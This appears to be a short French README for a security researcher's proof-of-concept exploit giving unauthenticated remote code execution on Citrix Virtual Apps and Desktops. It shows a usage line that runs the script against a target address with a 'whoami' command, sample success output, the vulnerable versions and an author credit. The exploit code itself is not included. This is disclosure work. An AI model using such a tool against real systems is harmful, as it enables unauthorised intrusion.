
Citrix Virtual Apps and Desktops (XEN) RCE non authentifiée
Citrix Virtual Apps and Desktops (XEN) - Exécution de code à distance non authentifiée
Consultez notre article de blog pour des informations techniques détaillées.
https://github.com/user-attachments/assets/563fd110-5321-49f7-8dc3-48eb0a53e0f9
python exploit-citrix-xen.py --target 192.168.1.120 --port 80 --cmd "whoami"
CVE-xxxx-xxxxx.py
(*) Citrix Virtual Apps and Desktops - Exécution de code à distance non authentifiée (CVE-xxxx-xxxxx) exploit by watchTowr
CVE: [CVE-xxxx-xxxxx]
[INFO] Commande envoyée avec succès à 192.168.1.120 !
Citrix Virtual Apps and Desktops 7 2402 LTSR et toutes les versions antérieures sont vulnérables. Pour plus de détails, veuillez consulter le bulletin officiel de Citrix.
Cet outil d'exploitation a été écrit par Sina Kheirkhah (@SinSinology), de watchTowr (@watchtowrcyber).
Pour rester informé des dernières recherches en sécurité, suivez l'équipe du laboratoire watchTowr :